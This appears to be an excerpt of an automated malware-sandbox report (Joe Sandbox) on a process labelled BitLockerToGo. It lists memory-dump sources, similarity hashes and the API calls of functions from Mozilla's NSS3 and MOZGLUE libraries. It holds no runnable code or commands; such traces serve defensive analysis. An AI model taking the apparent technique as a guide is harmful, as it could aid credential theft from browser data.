                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                                                    • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                    • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a3294229888181108d6d27e9779954bc83be35e8eceaaebad79881d2c0520bd0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7d049e565a34465fcae1cacda9f078fe0dc481691af6e22d9f85e84a02c1f891
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3294229888181108d6d27e9779954bc83be35e8eceaaebad79881d2c0520bd0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64513A72B016494FC708CDADDC927DEB7DAABA8310F48C23AE442DB781D638D946C791
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?), ref: 6CA2B039
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B090
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B0A2
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?,?,?), ref: 6CA2B100
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,00000002,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?), ref: 6CA2B115
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B12D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA19EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA2C6FD,?,?,?,?,6CA7F965,00000000), ref: 6CA19F0E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA19EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA7F965,00000000), ref: 6CA19F5D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3155957115-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f8bd630076e0cf1f6736fd070bd06d3a453a1f12beefc448c33320f852181331
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8ec4c7d15187a565c9e48f6f9190646f98c7649e46d722c00c9d43282c9003ea
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8bd630076e0cf1f6736fd070bd06d3a453a1f12beefc448c33320f852181331
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F691E1B0A042158FDB14CF39D984A6BB7B6FF45304F1C462DE41697B50EB38E884CB51
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF14E4,6CB5CC70), ref: 6CBA8D47
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA8D98
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80F00: PR_GetPageSize.NSS3(6CA80936,FFFFE8AE,?,6CA116B7,00000000,?,6CA80936,00000000,?,6CA1204A), ref: 6CA80F1B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80F00: PR_NewLogModule.NSS3(clock,6CA80936,FFFFE8AE,?,6CA116B7,00000000,?,6CA80936,00000000,?,6CA1204A), ref: 6CA80F25
                                                                                                                                                                                                                                                                                                                    • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CBA8E7B
                                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?), ref: 6CBA8EDB
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA8F99
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA910A
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                                                    • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5614f67b7e13cf9858bffcaf70f50f7c563752c9f6498775dfb4638ef8c19306
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 463e200f76c08d3e2d787a5cdb6731494da61c78cd0ce8f211f755c53ffdd05f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5614f67b7e13cf9858bffcaf70f50f7c563752c9f6498775dfb4638ef8c19306
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D029931D092D19FEB188F59C46876ABBB2EF42304F19825ED8D15FA91C333D94AC791
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9C2C31
                                                                                                                                                                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9C2C61
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C974E5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C974E97
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C2C82
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9C2E2D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9881DE
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBAD086
                                                                                                                                                                                                                                                                                                                    • PR_Malloc.NSS3(00000001), ref: 6CBAD0B9
                                                                                                                                                                                                                                                                                                                    • PR_Free.NSS3(?), ref: 6CBAD138
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: >
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9E8A4B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9E88F0
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9E925C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C9B6D45
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9B6E1E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4169067295-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
• Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CB01052
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CB01086
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
• Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3432436631
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aa0a46008aacddf272261fb8a8480540d887bd6fde19a9e43dcc17c44868768e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 048d5ac88bbafe43372843ebe6a88525775d367de5c506289f9df64ffd2f3f65
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa0a46008aacddf272261fb8a8480540d887bd6fde19a9e43dcc17c44868768e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B716B706082509FDB04CF28E894AAABBF5FF89314F18C619F95997341D730A986CBD5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CAEEE3D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2062749931-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 069f7d3985b058226e86b9ca6c77badf544891672b6363254df5b4403a050318
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E971D272E017018FD718CF59D8806AAB7F2EB8C314F19862DD85697B91D730E980DBD1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcmp.VCRUNTIME140(?,?,6C984A63,?,?), ref: 6C9B5F06
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f9b84d642bf0feeb07b7e05041c62d445ca763a4520d074481a95d826f94bb0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ab7921ce70af380c7e2b471b2340586f2fd6c334f518e25e046aa9877d45588b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f9b84d642bf0feeb07b7e05041c62d445ca763a4520d074481a95d826f94bb0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC1AF75E01209ABCB04CF95C5906EEFBB6FF8A318F28425DD8557BB45D732A806CB90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: winUnlockReadLock
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4244601998
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ce8fa48bef79e1a805c3328595128ba9adc53febf3e61d5a5cb738a83879ee8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ff2ba186647e7cf97fe513690307457110ae352a43e7574517fd456fd1b76c57
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ce8fa48bef79e1a805c3328595128ba9adc53febf3e61d5a5cb738a83879ee8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E13770A083808FDB44DF28E58465ABBF0FF89748F198A1DE89997351E734D985CF86
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dd002deb7c4bb720e901b6777861c564866c4292dc6fdb8ab7ff55671b68bba1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8220771E04669CFDB14CF98C890AADF7B6FF89308F548199D44AA7705D731A986CF80
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 16b19db587d712627a1d5f7c4aba2f4f1ba577eb39f4dd62fc827e74f492de22
                                                                                                                                                                                                                                                                                                                    • Instruction ID: da33c61c4693a9e97d70c1e900081f648f74a4f594c78513f56557434f42d12c
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b19db587d712627a1d5f7c4aba2f4f1ba577eb39f4dd62fc827e74f492de22
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF15D716083458FD702CF28C48036ABBF6AFED318F158A2DE4D4877A1EB74D8858792
APIs
• LoadLibraryW.KERNEL32(user32,?,6C9AE1A5), ref: 6C9D5606
• LoadLibraryW.KERNEL32(gdi32,?,6C9AE1A5), ref: 6C9D560F
• GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C9D5633
• GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C9D563D
• GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C9D566C
• GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C9D567D
• GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C9D5696
• GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C9D56B2
• GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C9D56CB
• GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C9D56E4
• GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C9D56FD
• GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C9D5716
• GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C9D572F
• GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C9D5748
• GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C9D5761
• GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C9D577A
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C9D5793
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C9D57A8
• GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C9D57BD
• GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C9D57D5
• GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C9D57EA
• GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C9D57FF
Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
